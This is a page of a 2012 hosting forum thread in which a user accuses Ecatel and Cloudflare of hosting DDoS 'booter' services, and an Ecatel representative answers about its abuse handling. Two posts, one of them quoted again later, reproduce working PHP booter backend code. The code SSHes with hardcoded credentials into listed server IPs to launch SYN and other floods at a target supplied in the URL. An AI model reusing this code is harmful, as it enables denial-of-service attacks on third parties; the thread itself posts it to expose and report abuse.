Page 1 of 11 1234 ... LastLast
Results 1 to 25 of 267
  1. #1
    Join Date
    Aug 2012
    Posts
    96

    Exclamation Cloudflare and Ecatel working together to help Cyber crimals

    Hello All,

    I am here to inform you all of Ecatel's and Cloudflare's relationship.

    Ecatel want proof of there clients doing anything illegal?

    Well isn't hosting a PHP Hub to send DDoS attacks , Illegal?

    Cloudflare say 'no attack traffic comes through out network' Yes in my report i didn't saying anything about traffic coming through your network.

    Picture of the section - Hackforums has a section dedicated to booters.

    The attack servers are mainly with Ecatel.

    They will deny it on here , but they know its true.

    They allow people to have a paid box with them I mean they allow spoofed attack outbound so they don't even get reports about the attacks so they don't care.

    List of booters :

    http://elitestresser.com/index.php - A Records ,173.245.60.51, 173.245.60.135

    Cloudflare ^

    http://absoboot.com - A Records 108.162.199.99, 108.162.194.198

    Cloudflare ^

    http://quantumbooter.net - A Records ns1.xsltel.com, ns2.xsltel.com, ns3.xsltel.com, ns4.xsltel.com - 80.82.69.148

    Ecatel ^

    List goes on.


    I come here to post the truth because I want something done about these illegal tools on the internet.

    They wont listen to my abuse reports so I'll go public with it.
      0 Not allowed!

  2. #2
    Join Date
    Dec 2002
    Location
    Bulgaria
    Posts
    186
    You are posting a well-known fact. I am not sure what you expect to happen. I am sure that it is absolutely clear to everyone that this thread would not change anything. There are hundreds of others just like it. Cloudflare - in reality did nto do absolutely nothing, as the traffic indeed does not go though their servers. Ecatel will come and deny it and never would get an abuse report just because after reflection UDP DDoS it is next to impossible to track the initial server. Hackforums on the other side claim that they allow advertisement of legla tools for stress testing of own servers.

    My point - just another thread that will die out in a day as noone from here could do anything about it. Ecatel are already well-known for hosting all kinds of **** on their network.
      0 Not allowed!

  3. #3
    Join Date
    Apr 2010
    Location
    Canada
    Posts
    1,770
    Quote Originally Posted by LiquidSolutions View Post
    Hackforums on the other side claim that they allow advertisement of legla tools for stress testing of own servers
    This is the kind of things you would like to shutdown but you really can't.
    Maxence H. - UBservers.com
    Specialists in high-performance hosting since 2008!
    Outstanding 24x7 support - Canada, USA, France

    SSD VPS Dedicated Servers SSD Web Hosting
      0 Not allowed!

  4. #4
    Join Date
    Jun 2009
    Posts
    1,219
    http://www.secanalyst.org/2011/08/23...anding-ecatel/

    Just one of a few sources that relate Ecatel to the notorious Russian Business Network.
    Last edited by Amitz; 08-14-2012 at 11:26 AM.
      0 Not allowed!

  5. #5
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Anyone can sent a report to abuse@ecatel.net (24/7 staffed e-mail). In case of activities which are not allowed by the Dutch laws we will act almost immediately. Please do not forget to sent proof and logfiles, we need these to take necessary steps.

    @amitz, ecatel is not part of the RBN network. We are a dutch ISP providing hosting services since 2004. That's all.

    Report your problem at abuse@ecatel.net first and sent some proof with information, i am sure they will help you in that case.

    thanks.
      0 Not allowed!

  6. #6
    Join Date
    Aug 2012
    Posts
    96
    Quote Originally Posted by Ecatel View Post
    Anyone can sent a report to abuse@ecatel.net (24/7 staffed e-mail). In case of activities which are not allowed by the Dutch laws we will act almost immediately. Please do not forget to sent proof and logfiles, we need these to take necessary steps.

    @amitz, ecatel is not part of the RBN network. We are a dutch ISP providing hosting services since 2004. That's all.

    Report your problem at abuse@ecatel.net first and sent some proof with information, i am sure they will help you in that case.

    thanks.
    What proof do you want?



    You said after I emailed you 'proof' of client doing something illegal?

    Well

    Go to the website the word 'booter' isn't enough for you to smell the ****ing coffee?

    I mean I can go ahead and release a bunch of booter sources I have from providers that have given them to me after reports with the SSH2 PHP code with YOUR IP's still there.

    Would that be enough?

    Are you going to stop these illegal activity going out of your network?

    Stop the spoofing ecatel!
      0 Not allowed!

  7. #7
    Join Date
    Jun 2009
    Posts
    1,219
    @ecatel: I am not so careless to say that you are part of the RBN. I just say that there are quite a lot of others that claim this. And to be honest: You know that you are not just a dutch ISP. Your network is one of the worst in terms of spam, botnets and illegal activities. That reputation is your main selling point.
      0 Not allowed!

  8. #8
    Join Date
    Dec 2002
    Location
    Bulgaria
    Posts
    186
    Quote Originally Posted by Ecatel View Post
    Anyone can sent a report to abuse@ecatel.net (24/7 staffed e-mail). In case of activities which are not allowed by the Dutch laws we will act almost immediately. Please do not forget to sent proof and logfiles, we need these to take necessary steps.

    @amitz, ecatel is not part of the RBN network. We are a dutch ISP providing hosting services since 2004. That's all.

    Report your problem at abuse@ecatel.net first and sent some proof with information, i am sure they will help you in that case.

    thanks.
    And you just confirmed what I wrote down.

    Please explain how do you expect to get logs from a spoofed reflection attack, initiated from one of your servers?

    And also the majority, probably 98% of the other providers do not allow spoofing from their network, you still do, which I find majorly shady.

    I get tens of tickets about "Hey, this guy from HFs attacked me" and I literally can not do anything about it, no matter I know where the original server came from, other than just watching how my network pipe gets filled unless I blackhole the IP.

    Anyway, I have already been in this duscussion many, many times this year. I am out.

    Gratz
      0 Not allowed!

  9. #9
    Join Date
    Aug 2012
    Posts
    96
    <?php
    include('Net/SSH2.php');
    define('NET_SSH2_LOGGING', true);
    $ip = array("94.102.52.144","89.248.160.192","93.174.93.239");
    $ip = $ip[rand(0, count($ip) - 1)];
    $user = "flooder";
    $pass = "FloodYourMother";
    $command = "clientflooder {$_GET["host"]} {$_GET["port"]} GMSA {$_GET["time"]} 100";
    $ssh = new Net_SSH2($ip);
    if (!$ssh->login($user, $pass)) {
    exit('Login Failed');
    }

    echo $ssh->exec($command);

    ?>

    Password's have since been changed but still..
      0 Not allowed!

  10. #10
    Join Date
    Aug 2012
    Posts
    96
    <?php
    include('Net/SSH2.php');
    define('NET_SSH2_LOGGING', NET_SSH2_LOG_COMPLEX);
    $ip = array("89.248.160.213","89.248.172.240","80.82.64.71");
    $ip = $ip[rand(0, count($ip) - 1)];
    $user = "root";
    $pass = "k1a2j397";
    $command = "./ssyn {$_GET["host"]} {$_GET["port"]} {$_GET["time"]}";
    $ssh = new Net_SSH2($ip);
    if (!$ssh->login($user, $pass)) {
    exit('Login Failed');
    }

    echo $ssh->exec($command);

    ?>

    These ones still work I believe gonna suspend them ecatel or Just offer the client a new IP?

    Password's don't work but the IPs are still alive , currently there will be no outgoing floods as the crimal's site is offline due to an abuse report. you see ecatel other provider act upon abuse something you don't.
    Last edited by Eccie; 08-14-2012 at 11:48 AM. Reason: Update.
      0 Not allowed!

  11. #11
    Join Date
    Jun 2011
    Location
    Internet
    Posts
    2,985
    Quote Originally Posted by ubservers View Post
    This is the kind of things you would like to shutdown but you really can't.
    All of the "stress testers" don't use their own hardware, so it isn't legal anyway. I'd just drop them if I were cloudflare.
      0 Not allowed!

  12. #12
    Join Date
    Aug 2012
    Posts
    96
    Quote Originally Posted by Flapadar View Post
    All of the "stress testers" don't use their own hardware, so it isn't legal anyway. I'd just drop them if I were cloudflare.

    Thanks Hopefully someone from Cloudflare see's this.
      0 Not allowed!

  13. #13
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Quote Originally Posted by LiquidSolutions View Post
    And you just confirmed what I wrote down.

    Please explain how do you expect to get logs from a spoofed reflection attack, initiated from one of your servers?

    And also the majority, probably 98% of the other providers do not allow spoofing from their network, you still do, which I find majorly shady.

    I get tens of tickets about "Hey, this guy from HFs attacked me" and I literally can not do anything about it, no matter I know where the original server came from, other than just watching how my network pipe gets filled unless I blackhole the IP.

    Anyway, I have already been in this duscussion many, many times this year. I am out.

    Gratz
    We monitor our customers network ports, when a customer server is hacked and sending a ddos attack we see high different in traffic. Or peaks with a straight line. In that case we act ourself if there is no report and suspend the customers server.

    If you receive a ddos attack from someone that doesnt mean it comes from us. There are many other providers out there aswell. If you think someone is sending a ddos out of our network you can always e-mail and we sflow customers traffic for confirmation. If it appears you are right we shutdown the customer.
      0 Not allowed!

  14. #14
    Join Date
    Feb 2012
    Posts
    276
    Quote Originally Posted by Ecatel View Post
    We monitor our customers network ports, when a customer server is hacked and sending a ddos attack we see high different in traffic. Or peaks with a straight line. In that case we act ourself if there is no report and suspend the customers server.

    If you receive a ddos attack from someone that doesnt mean it comes from us. There are many other providers out there aswell. If you think someone is sending a ddos out of our network you can always e-mail and we sflow customers traffic for confirmation. If it appears you are right we shutdown the customer.
    I don't believe you.

    You see the booter on your network in the OP

    What are you going to do to that?

    XSLTel is a criminal .

    Remove them from your network.

    They have a lot of illegal things on your network.

    There was a thread on here a few weeks ago about him being in an hacking clan and using your network to send flood.

    I believe his servers were all suspended at one point due to sending 10gbit of flood.

    That's what I was informed.
    Last edited by JackS00; 08-14-2012 at 12:09 PM. Reason: Spelling mistake.
      0 Not allowed!

  15. #15
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Quote Originally Posted by Amitz View Post
    @ecatel: I am not so careless to say that you are part of the RBN. I just say that there are quite a lot of others that claim this. And to be honest: You know that you are not just a dutch ISP. Your network is one of the worst in terms of spam, botnets and illegal activities. That reputation is your main selling point.
    Many people who do not know what they are talking about say we host spam, botnets, malware etc. Like you, posting a link of 2011 which doesnt make any sense. The writer of that article is talking pure nonsense. Do you know any malware websites? message them to me and we shut them down. We have a VERY tight policy against spam and malware for years. Many of our customers can confirm we are VERY difficult if it appears our customer is hosting spam or malware. Also see:

    http://noc.ecatel.net/ecatel-abuse.html
      0 Not allowed!

  16. #16
    Join Date
    Jun 2011
    Location
    Internet
    Posts
    2,985
    Quote Originally Posted by Ecatel View Post
    We monitor our customers network ports, when a customer server is hacked and sending a ddos attack we see high different in traffic. Or peaks with a straight line. In that case we act ourself if there is no report and suspend the customers server.

    If you receive a ddos attack from someone that doesnt mean it comes from us. There are many other providers out there aswell. If you think someone is sending a ddos out of our network you can always e-mail and we sflow customers traffic for confirmation. If it appears you are right we shutdown the customer.
    Out of curiosity - a lot of people in the thread mentioned source spoofing. Do you guys allow that for specific (legitimate) usage, or is it enabled for everyone?

    If the second it might be worth moving toward the first to stop stuff like this.
      0 Not allowed!

  17. #17
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Quote Originally Posted by DotVPS-J View Post
    I don't believe you.

    You see the booter on your network in the OP

    What are you going to do to that?

    XSLTel is a crimal.

    Remove them from your network.

    They have a lot of illegal things on your network.

    There was a thread on here a few weeks ago about him being in an hacking clan and using your network to send flood.

    I believe his servers were all suspended at one point due to sending 10gbit of flood.

    That's what I was informed.
    We dont remove someone because of their reputation. Some people informed us about this thread you mention. I can assure you they *did not* use our network for any attacks. If this was happened we had already shutdown the servers!

    And also You as an old customer from us know we are against criminal activities. We have a very active abusedesk.
      0 Not allowed!

  18. #18
    Join Date
    Feb 2012
    Posts
    276
    Quote Originally Posted by Ecatel View Post
    We dont remove someone because of their reputation. Some people informed us about this thread you mention. I can assure you they *did not* use our network for any attacks. If this was happened we had already shutdown the servers!

    And also You as an old customer from us know we are against criminal activities. We have a very active abusedesk.
    Yes I know you were pretty good at abuse reports I'll give you that but I don't understand why you are allowing a booter to be on your network?
      0 Not allowed!

  19. #19
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Quote Originally Posted by Eccie View Post
    <?php
    include('Net/SSH2.php');
    define('NET_SSH2_LOGGING', NET_SSH2_LOG_COMPLEX);
    $ip = array("89.248.160.213","89.248.172.240","80.82.64.71");
    $ip = $ip[rand(0, count($ip) - 1)];
    $user = "root";
    $pass = "k1a2j397";
    $command = "./ssyn {$_GET["host"]} {$_GET["port"]} {$_GET["time"]}";
    $ssh = new Net_SSH2($ip);
    if (!$ssh->login($user, $pass)) {
    exit('Login Failed');
    }

    echo $ssh->exec($command);

    ?>

    These ones still work I believe gonna suspend them ecatel or Just offer the client a new IP?

    Password's don't work but the IPs are still alive , currently there will be no outgoing floods as the crimal's site is offline due to an abuse report. you see ecatel other provider act upon abuse something you don't.
    Hello,

    Have you already contacted our abusedesk? It is possible the customer is using this servers indeed for criminal activities or the servers of our customer are hacked and abused for ddos attacks. I will forward it to abuse and will ask them for the status on this case.
      0 Not allowed!

  20. #20
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    Quote Originally Posted by DotVPS-J View Post
    Yes I know you were pretty good at abuse reports I'll give you that but I don't understand why you are allowing a booter to be on your network?
    We dont allow that. But to act against a report we need proof the servers are indeed used for criminal activities. If a domain is hosted on a ip this can be a shared server (hosting multiple domains) or a VPS account. We always first give our customers the oppertunity to take action against the matter theirself before we start nullrouting ips.
      0 Not allowed!

  21. #21
    Join Date
    Aug 2012
    Posts
    96
    Quote Originally Posted by Ecatel View Post
    Hello,

    Have you already contacted our abusedesk? It is possible the customer is using this servers indeed for criminal activities or the servers of our customer are hacked and abused for ddos attacks. I will forward it to abuse and will ask them for the status on this case.
    I didn't forward it to abuse as I thought you would just offer them a new IP and it would be a waste of my time.
      0 Not allowed!

  22. #22
    Join Date
    Aug 2012
    Posts
    96
    Quote Originally Posted by Ecatel View Post
    We dont allow that. But to act against a report we need proof the servers are indeed used for criminal activities. If a domain is hosted on a ip this can be a shared server (hosting multiple domains) or a VPS account. We always first give our customers the oppertunity to take action against the matter theirself before we start nullrouting ips.
    Yes indeed it does look like XSLTel's shared service its hosted upon however shouldn't the provider be pro-actively looking for this content?
      0 Not allowed!

  23. #23
    Join Date
    Aug 2012
    Posts
    96
    I feel much better now that Ecatel have heard what I have to say.

    Now I need to hear from Cloudflare.
      0 Not allowed!

  24. #24
    Join Date
    Jun 2006
    Location
    Amsterdam
    Posts
    499
    @ eccie, we checked your report!

    89.248.160.213 = was already terminated few days ago by our abuse dept..
    89.248.172.240 = VPS server from one of our customers, we indeed see peaks to 500 mbit. We have contacted our customer and ratelimited the server to 100 mbit.
    80.82.64.71= We also see peaks to 500 mbit on this servger. Also a VPs server located on a node of one of our resellers, server has been ratelimited to 100 mbit temporary and customer was contacted.

    I can confirm you all three ips mentioned here are *not* owned or have anything to do with xsltel at all.
      0 Not allowed!

  25. #25
    Join Date
    Aug 2012
    Posts
    96
    Quote Originally Posted by Flapadar View Post
    Out of curiosity - a lot of people in the thread mentioned source spoofing. Do you guys allow that for specific (legitimate) usage, or is it enabled for everyone?

    If the second it might be worth moving toward the first to stop stuff like this.
    From What I have read on hackforums , It's enabled on all 1000mbit servers but the users cant do it on 100mbit port servers...

    What ever you did to those 100mbit's Ecatel you should do to the 1000mbits too!!
      0 Not allowed!

Page 1 of 11 1234 ... LastLast

Similar Threads

  1. CLOUDFLARE.COM supporting cyber crime terrorists (credit card fraud)
    By mybestfriend in forum Hosting Security and Technology
    Replies: 15
    Last Post: 05-25-2012, 03:38 AM
  2. Replies: 0
    Last Post: 11-30-2010, 04:46 AM
  3. Replies: 9
    Last Post: 04-28-2008, 11:30 PM
  4. Replies: 4
    Last Post: 09-10-2005, 04:23 PM
  5. FormMail CGI's stoped working - POST not working?!?
    By jucebro in forum Dedicated Server
    Replies: 14
    Last Post: 12-04-2001, 09:42 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •